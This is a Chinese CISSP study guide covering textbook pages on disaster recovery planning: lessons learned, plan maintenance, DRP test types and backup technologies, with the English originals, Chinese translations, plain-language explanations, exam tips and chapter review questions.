先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

日志要保护完整性、时间同步和访问控制。

准备、检测、遏制、根除、恢复、经验教训是常见顺序。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
日志 日志记录系统和用户活动,用于监控、审计和调查。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
学习单元 54 / PDF P1270

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Were documented procedures followed? Were the procedures adequate? What information was needed sooner? Were any steps or actions taken that might have inhibited the recovery? What would the staff and management do differently the next time a similar incident occurs? How could information sharing with other organizations have been improved? What corrective actions can prevent similar incidents in the future? What precursors or indicators should be watched for in the future to detect similar incidents? What additional tools or resources are needed to detect, analyze, and mitigate future incidents?

The responses to these questions, if given honestly, will provide valuable insight into the state of the organization's incident response program. They can help provide a road map of future improvements designed to bolster disaster recovery. The facilitator should work with the team leader to document the lessons learned in a report that includes suggested process improvement actions. Maintenance Remember that a disaster recovery plan is a living document. As your organization's needs change, you must adapt the disaster recovery plan to meet those changed needs to follow suit. You will discover many necessary modifications by using a well-organized and coordinated testing plan.

Minor changes may often be made through a series of telephone conversations or emails, whereas major changes may require one or more meetings of the full disaster recovery team. A disaster recovery planner should refer to the organization's business continuity plan as a template for its recovery efforts. This and all the supportive material may need to comply with applicable regulations and reflect current business needs. Business processes such as payroll and order generation should contain specified metrics mapped to related IT systems and infrastructure.

中文直译 / 整理

是否遵循了既定程序? 程序是否充分? 哪些信息需要更早提供? 是否采取了任何可能阻碍恢复的步骤或行动? 下次发生类似事件时,员工和管理层会采取哪些不同的措施? 如何改进与其他组织的信息共享? 哪些纠正措施可以防止未来发生类似事件? 未来应关注哪些前兆或指标,以检测类似事件? 需要哪些额外的工具或资源来检测、分析和缓解未来的事件? 如果诚实地回答这些问题,将有助于深入了解组织事件响应计划的现状。 它 们可以为未来旨在加强灾难恢复的改进提供路线图。 引导者应与团队负责人 合作,将所学到的经验教训记录在一份报告中,其中应包括建议的流程改进 措施。 维护 请记住,灾难恢复计划是一个动态文档。 随着组织需求的变化,您必须调整灾 难恢复计划以适应这些变化。 通过实施一个组织良好且协调的测试计划,您将 发现许多必要的修改。 小改动通常可以通过一系列电话或电子邮件完成,而重 大改动则可能需要召开一次或多次完整的灾难恢复团队会议。 灾难恢复规划者应将组织的业务连续性计划作为其恢复工作的模板。 此计划 及所有支持材料可能需要符合适用的法规,并反映当前的业务需求。 诸如工 资发放和订单生成等业务流程应包含与相关IT系统和基础设施映射的指定指 标。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

事件响应:事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

准备、检测、遏制、根除、恢复、经验教训是常见顺序。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
学习单元 55 / PDF P1271

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Most organizations apply formal change management processes so that whenever the IT infrastructure changes, all relevant documentation is updated and checked to reflect such changes. Regularly scheduled fire drills and dry runs to ensure that all elements of the DRP are used properly to keep staff trained present a perfect opportunity to integrate changes into regular maintenance and change management procedures. Design, implement, and document changes each time you go through these processes and exercises. Know where everything is, and keep each element of the DRP working properly. In case of an emergency, use your recovery plan.

Finally, make sure the staff stays trained to keep their skills sharp—for existing support personnel—and use simulated exercises to bring new people up to speed quickly. Test Communications Before embarking on any test, it's essential to inform all stakeholders about what to expect. This includes giving them an idea of the scheduled timing, the potential impacts, and the overarching goals of the test. By doing so, you not only ensure that business operations continue smoothly, but you're also managing and setting accurate expectations. During the test, especially ones that might disrupt normal operations like full-interruption tests, giving regular updates becomes crucial.

Stakeholders need to be kept in the loop about the progress, any challenges faced, and any deviations from the expected end time. Such transparency not only keeps everyone informed but also helps in building trust. Post-test, a debriefing session provides an opportunity for discussing the outcomes of the test, highlighting both the successes and pinpointing areas that need improvement. It provides closure to the current test and paves the way for future enhancements. Many industries and regions have stringent regulations dictating the details of disaster recovery plan testing.

Keeping regulators informed is not just about compliance, but it also underscores the organization's commitment to resilience and good governance. Furthermore, maintaining comprehensive records and sharing them as required reinforces this commitment and keeps the regulatory relationship transparent. Summary

中文直译 / 整理

大多数组织采用正式的变更管理流程,以确保每当IT基础设施发生变化时,所 有相关文档都会更新并核对,以反映这些变更。 定期安排的消防演习和模拟演 练,可确保灾难恢复计划(DRP)的所有要素得到正确使用,从而保持员工的 培训水平,这为将变更整合到常规维护和变更管理流程中提供了绝佳机会。 每 次进行这些流程和演练时,都应设计、实施并记录变更。 清楚了解所有内容的 位置,并确保DRP的每个要素正常运行。 在紧急情况下,使用您的恢复计划。 最后,确保员工持续接受培训,以保持现有支持人员的技能熟练度,并通过模 拟演练快速提升新员工的能力。 测试通信 在开始任何测试之前,必须通知所有相关方预期的内容。 这包括让他们了解计 划的时间安排、潜在影响以及测试的总体目标。 这样做不仅能确保业务运营顺 利进行,还能有效管理并设定准确的预期。 在测试期间,尤其是可能干扰正常运营的全面中断测试,定期更新变得至关重 要。 需要让相关方及时了解进展、遇到的任何挑战以及与预期结束时间的任何 偏差。 这种透明度不仅能让所有人保持知情,还有助于建立信任。 测试后,复盘会议提供了一个讨论测试结果的机会,既突出成功之处,也明确 需要改进的领域。

它为当前测试画上句号,并为未来的改进铺平道路。 许多行业和地区都有严格的法规,规定了灾难恢复计划测试的细节。 及时向监 管机构通报情况不仅关乎合规,还体现了组织对韧性和良好治理的承诺。 此外, 保持完整的记录并按要求共享,将进一步强化这一承诺,并确保监管关系透明。 摘要

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

程序:程序是一步一步怎么做。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
程序 程序是一步一步怎么做。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 56 / PDF P1272

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

Disaster recovery planning is critical to a comprehensive information security program. DRPs serve as a valuable complement to business continuity plans and ensure that the proper technical controls are in place to keep the business functioning and to restore service after a disruption. In this chapter, you learned about the different types of natural and humanmade disasters that may impact your business. You also explored the types of recovery sites and backup strategies that bolster your recovery capabilities. An organization's disaster recovery plan is one of the most important documents under the purview of security professionals.

It should provide guidance to the personnel responsible for ensuring the continuity of operations in the face of disaster. The DRP provides an orderly sequence of events designed to activate alternate processing sites while simultaneously restoring the primary site to operational status. Once you've successfully developed your DRP, you must train personnel on its use, ensure that you maintain accurate documentation, and conduct periodic tests to keep the plan fresh in the minds of responders. Study Essentials Know the common types of natural disasters that may threaten an organization.

Natural disasters that commonly threaten organizations include earthquakes, floods, storms, fires, pandemics, tsunamis, and volcanic eruptions. Know the common types of human-made disasters that may threaten an organization. Explosions, electrical fires, terrorist acts, power outages, other utility failures, infrastructure failures, hardware/software failures, labor difficulties, theft, and vandalism are all common human-made disasters. Be familiar with the common types of recovery facilities. The common types of recovery facilities are cold sites, warm sites, hot sites, mobile sites, cloud computing, and multiple sites.

Be sure you understand the benefits and drawbacks of each such facility. Explain the potential benefits behind mutual assistance agreements as well as the reasons they are not commonly implemented in businesses today. Mutual assistance agreements (MAAs) provide an inexpensive alternative to disaster recovery sites, but they are not commonly used because they are difficult to enforce. Organizations participating in an

中文直译 / 整理

灾难恢复规划是全面信息安全计划的关键组成部分。 灾难恢复计划(DRP)作 为业务连续性计划的重要补充,确保具备适当的技控措施,以维持业务运转并 在中断后恢复服务。 在本章中,您了解了可能影响您业务的各种自然灾害和人为灾害。 您还探讨了 能够增强您恢复能力的恢复站点类型和备份策略。 组织的灾难恢复计划是安全专业人员职责范围内最重要的文档之一。 它应为负 责确保在灾难发生时业务持续运行的人员提供指导。 灾难恢复计划提供了一套 有序的事件序列,旨在激活备用处理站点,同时将主站点恢复至正常运行状态。 一旦您成功制定了灾难恢复计划,就必须对人员进行使用培训,确保维护准确 的文档,并定期进行测试,以使响应人员始终保持对计划的熟悉。 学习要点 了解可能威胁组织的常见自然灾害类型。 常见的威胁组织的自然灾害包括地震、 洪水、风暴、火灾、大流行、海啸和火山喷发。 了解可能威胁组织的常见人为灾害类型。 爆炸、电气火灾、恐怖行为、停电、 其他公用事业故障、基础设施故障、硬件/软件故障、劳资困难、盗窃和破坏 行为都是常见的人为灾害。 熟悉常见的恢复设施类型。 常见的恢复设施类型包括冷站点、温站点、热站点、 移动站点、云计算和多站点。

请务必了解每种设施的优缺点。 解释互助协议的潜在好处,以及它们为何在当今企业中不常被实施的原因。 互助 协议(MAAs)为灾难恢复站点提供了一种低成本的替代方案,但由于难以执行, 因此并不常见。 参与互助协议的组织

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 57 / PDF P1273

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

MAA may also be shut down by the same disaster, and MAAs raise confidentiality concerns. Understand the technologies that may assist with database backup. Databases benefit from three backup technologies. Electronic vaulting is used to transfer database backups to a remote site as part of a bulk transfer. In remote journaling, data transfers occur on a more frequent basis. With remote mirroring technology, database transactions are mirrored at the backup site in real time. Explain the common processes used in disaster recovery programs.

These programs should take a comprehensive approach to planning and include considerations related to the initial response effort, personnel involved, communication among the team members and with internal and external entities, assessment of response efforts, and restoration of services. DR programs should also include training and awareness efforts to ensure personnel understand their responsibilities and lessons learned sessions to continuously improve the program. Know the six types of disaster recovery plan tests and the impact each has on normal business operations.

The six types of disaster recovery plan tests are read-throughs, tabletops, walk-throughs, simulation tests, parallel tests, and full-interruption tests. Read-throughs are purely paperwork exercises, whereas tabletops and walk-throughs involve project team meetings. They have no impact on business operations. Simulation tests may shut down noncritical business units. Parallel tests involve relocating personnel but do not affect day-to-day operations. Full-interruption tests involve shutting down primary systems and shifting responsibility to the recovery facility. Written Lab 1. What are some of the main concerns businesses have when considering adopting a mutual assistance agreement? 2.

List and explain the six types of disaster recovery tests. 3. Explain the differences between the three types of backup strategies discussed in this chapter. 4. Describe how cloud computing influences disaster recovery programs.

中文直译 / 整理

也可能因同一灾难而停摆,且互助协议会引发机密性方面的担忧。 了解可能有助于数据库备份的技术。 数据库受益于三种备份技术。 电子 Vaulting 用于作为批量传输的一部分,将数据库备份传输到远程站点。 在远程 日志记录中,数据传输更为频繁。 使用远程镜像技术,数据库事务会实时在备份 站点进行镜像。 解释灾难恢复中常用的过程 程序。 这些程序应采取全面的规划方法,包括对初始响应工作、相关人员、团队 成员之间以及与内外部实体的沟通、响应评估和恢复服务的考虑。 灾难恢复程序 还应包括培训和意识提升工作,以确保人员了解其职责,并开展经验总结会议, 以持续改进该程序。 了解六种灾难恢复计划测试类型及其对正常业务运营的影响。 六种灾难恢复计划 测试类型包括阅读检查、桌面推演、步行演练、模拟测试、并行测试和完全中断 测试。 阅读检查纯粹是文书工作,而桌面推演和步行演练涉及项目团队会议,它 们对业务运营没有影响。 模拟测试可能会关闭非关键业务单元。 并行测试涉及人 员调动,但不影响日常运营。 完全中断测试涉及关闭主系统并将责任转移至恢复 设施。 书面实验 1. 企业在考虑采用互助协议时,主要关注哪些问题?

2. 列出并解释六种灾难恢复测试类型。 3. 解释本章讨论的三种备份策略之间的差异。 4. 描述云计算如何影响灾难恢复计划。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 58 / PDF P1274

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

Review Questions 1. James is working with his organization's leadership to help them understand the role that disaster recovery plays in their cybersecurity strategy. The leaders are confused about the differences between disaster recovery and business continuity. What is the end goal of disaster recovery planning? A. Preventing business interruption B. Setting up temporary business operations C. Restoring normal business activity D. Minimizing the impact of a disaster 2. Kevin is attempting to determine an appropriate backup frequency for his organization's database server and wants to ensure that any data loss is within the organization's risk appetite.

Which one of the following security process metrics would best assist him with this task? A. RTO B. MTD C. RPO D. MTBF 3. Brian's organization recently suffered a disaster and wants to improve their disaster recovery program based upon their experience. Which one of the following activities will best assist with this task? A. Training programs B. Awareness efforts C. BIA review D. Lessons learned 4. Adam is reviewing the fault tolerance controls used by his organization and realizes that they currently have a single point of failure in the disks used to support a critical server. Which one of the following controls can provide fault tolerance for these disks? A. Load balancing B. RAID

中文直译 / 整理

复习问题 1. 詹姆斯正在与组织的领导层合作,帮助他们理解灾难恢复在网络安全策略 中的作用。 领导层对灾难恢复和业务连续性之间的区别感到困惑。 灾难恢复 的最终目标是什么 恢复计划? A. 防止业务中断 B. 建立临时业务运营 C. 恢复正常的业务活动 D. 最小化灾难的影响 2. 凯文正在尝试确定其组织数据库服务器的适当备份频率,并希望确保任何 数据丢失都在组织的风险承受范围内。 以下哪一项安全流程指标最能帮助他 完成此任务? A. RTO B. MTD C. RPO D. MTBF 3. 布赖恩的组织最近遭遇了一次灾难,希望根据其经验改进其灾难恢复计划。 以下哪项活动最能帮助完成此任务? A. 培训计划 B. 意识提升工作 C. BIA 审查 D. 经验教训 4. 亚当正在审查其组织使用的容错控制措施,并意识到当前用于支持关键服 务器的磁盘存在单点故障。 以下哪一项控制措施可以为这些磁盘提供容错能 力? A. 负载均衡 B. RAID

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

恢复时间目标 RTO:RTO 是业务或系统最多能中断多久。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

RTO 问时间:多久必须恢复。

RPO 问数据:最多丢到哪个时间点。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
恢复时间目标 RTO RTO 是业务或系统最多能中断多久。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 59 / PDF P1275

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

C. Clustering D. High availability (HA) pairs 5. Brad is helping to design a disaster recovery strategy for his organization and is analyzing possible storage locations for backup data. He is not certain where the organization will recover operations in the event of a disaster and would like to choose an option that allows them the flexibility to easily retrieve data from any DR site. Which one of the following storage locations provides the best option for Brad? A. Primary data center B. Field office C. Cloud computing D. IT manager's home 6. Which of the following statements about business continuity planning and disaster recovery planning are correct? (Choose all that apply.) A.

Business continuity planning is focused on keeping business functions uninterrupted when a disaster strikes. B. Organizations can choose whether to develop business continuity planning or disaster recovery planning plans. C. Business continuity planning picks up where disaster recovery planning leaves off. D. Disaster recovery planning guides an organization through recovery of normal operations at the primary facility. 7. Tonya is reviewing the flood risk to her organization and learns that their primary data center resides within a 100-year floodplain. What conclusion can she draw from this information? A. The last flood of any kind to hit the area was more than 100 years ago. B.

The odds of a flood at this level are 1 in 100 in any given year. C. The area is expected to be safe from flooding for at least 100 years. D. The last significant flood to hit the area was more than 100 years ago. C.

中文直译 / 整理

聚类 D. 高可用性(HA)对 5. 布拉德正在帮助其组织设计灾难恢复策略,并分析备份数据的可能存储位 置。 他不确定在发生灾难时组织将在何处恢复运营,因此希望选择一种允许 他们从任何灾难恢复站点轻松检索数据的选项。 以下哪个存储位置为布拉德 提供了最佳选择? A. 主数据中心 B. 分支办公室 C. 云计算 D. IT经理的家 6. 以下关于业务连续性规划和灾难恢复规划的陈述,哪些是正确的? (可多选。 ) A. 业务连续性规划旨在灾难发生时保持业务功能不间断。 B. 组织可以选择是否制定业务连续性规划或灾难恢复规划。 C. 业务连续性规划在灾难恢复规划结束后接续进行。 D. 灾难恢复规划指导组织在主设施恢复正常的运营。 7. 托尼娅正在审查其组织面临的洪水风险,并了解到其主要数据中心位于百 年一遇的洪泛区内。 她能从这一信息中得出什么结论? A. 该地区上一次发生任何类型的洪水是在100多年前。 B. 任意一年发生此级别洪水的概率为100分之一。 C. 预计该地区在未来至少100年内不会发生洪水。 D. 该地区上一次发生重大洪水是在100多年前。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
学习单元 60 / PDF P1276

第 1276 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

8. Randi is designing a disaster recovery mechanism for her organization's critical business databases. She selects a strategy where an exact, up-todate copy of the database is maintained at an alternative location. What term describes this approach? A. Transaction logging B. Remote journaling C. Electronic vaulting D. Remote mirroring 9. Bryn runs a corporate website and currently uses a single server, which is capable of handling the site's entire load. She is concerned, however, that an outage on that server could cause the organization to exceed its RTO. What action could she take that would best protect against this risk? A. Install dual power supplies in the server. B.

Replace the server's hard drives with RAID arrays. C. Deploy multiple servers behind a load balancer. D. Perform regular backups of the server. 10. Carl recently completed his organization's annual business continuity plan refresh and is now turning his attention to the disaster recovery plan. What output from the business continuity plan can he use to prepare the business unit prioritization task of disaster recovery planning? A. Vulnerability analysis B. Business impact analysis C. Risk management D. Continuity planning 11. Nolan is considering the use of several different types of alternate processing facility for his organization's data center.

Which one of the following alternative processing sites takes the longest time to activate but has the lowest cost to implement? A. Hot site B. Mobile site C. Cold site 8.

中文直译 / 整理

兰迪正在为其组织的关键业务数据库设计灾难恢复机制。 她选择了一种 策略,即在备用位置维护数据库的精确、最新副本。 这种做法的术语是什么? A. 事务日志记录 B. 远程日记记录 C. 电子存档 D. 远程镜像 9. Bryn 运营一个企业网站,目前使用一台服务器,该服务器能够处理网站 的全部负载。 然而,她担心该服务器发生故障会导致组织超出其 RTO。 她可 以采取什么措施来最好地防范此风险? A. 在服务器中安装双电源。 B. 使用RAID阵列替换服务器的硬盘。 C. 在负载均衡器后部署多台服务器。 D. 定期备份服务器。 10. 卡尔最近完成了其组织的年度业务连续性计划更新,现在正将注意力 转向灾难恢复计划。 他可以使用业务连续性计划中的哪些输出来准备灾难 恢复规划中的业务单元优先级任务? A. 漏洞分析 B. 业务影响分析 C. 风险管理 D. 连续性规划 11. 纳兰正在为组织的数据中心考虑使用几种不同类型的备用处理设施。 以 下哪种备用处理站点激活时间最长但实施成本最低? A. 热站点 B. 移动站点 C. 冷站点

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复时间目标 RTO:RTO 是业务或系统最多能中断多久。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1276 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

RTO 问时间:多久必须恢复。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复时间目标 RTO RTO 是业务或系统最多能中断多久。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 61 / PDF P1277

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

D. Warm site 12. Ingrid is concerned that one of her organization's data centers has been experiencing a series of momentary power outages. Which one of the following controls would best preserve their operating status? A. Generator B. Dual-power supplies C. UPS D. Redundant network links 13. Which one of the following items is a characteristic of hot sites but not a characteristic of warm sites? A. Communications circuits B. Workstations C. Servers D. Current data 14. Harry is conducting a disaster recovery test. He moved a group of personnel to the alternate recovery site where they are mimicking the operations of the primary site but do not have operational responsibility.

What type of disaster recovery test is he performing? A. Read-through B. Walk-through C. Simulation test D. Parallel test 15. What type of document will help public relations specialists and other individuals who need a high-level summary of disaster recovery efforts while they are underway? A. Executive summary B. Technical guides C. Department-specific plans D. Checklists D.

中文直译 / 整理

温备站点 12. 英格丽担心她组织的一个数据中心最近经历了一系列短暂的断电。 以下 哪种控制措施最能维持其运行状态? A. 发电机 B. 双电源 C. 不间断 电源 D. 冗余网络链路 13. 以下哪一项是热备站点的特征,但不是温备站点的特征? A. 通信电路 B. 工作站 C. 服务器 D. 当前数据 14. 哈里正在执行灾难恢复测试。 他将一组人员转移到备用恢复站点,他们正 在模拟主站点的操作,但不承担运营责任。 他正在执行哪种类型的灾难恢复 测试? A. 读取演练 B. 实地演练 C. 模拟测试 D. 并行测试 15. 哪种类型的文档有助于公关专家和其他 人员在灾难恢复进行期间获得高层概要? A. 执行摘要 B. 技术指南 C. 部门特定计划 D. 检查清单

小白解释

场景先行:你是公司的安全负责人,正在读第 1277 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

指南:指南是建议做法,不一定强制。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Recommended、not compulsory 常对应 guideline。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
指南 指南是建议做法,不一定强制。
学习单元 62 / PDF P1278

第 1278 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

16. What disaster recovery planning tool can be used to protect an organization against the failure of a critical software firm to provide appropriate support for their products? A. Differential backups B. Business impact assessment C. Incremental backups D. Software escrow agreement 17. What type of backup involves always storing copies of all files modified since the most recent full backup? A. Differential backups B. Partial backup C. Incremental backups D. Database backup 18. You operate a grain processing business and are developing your restoration priorities. Which one of the following systems would likely be your highest priority? A. Order-processing system B.

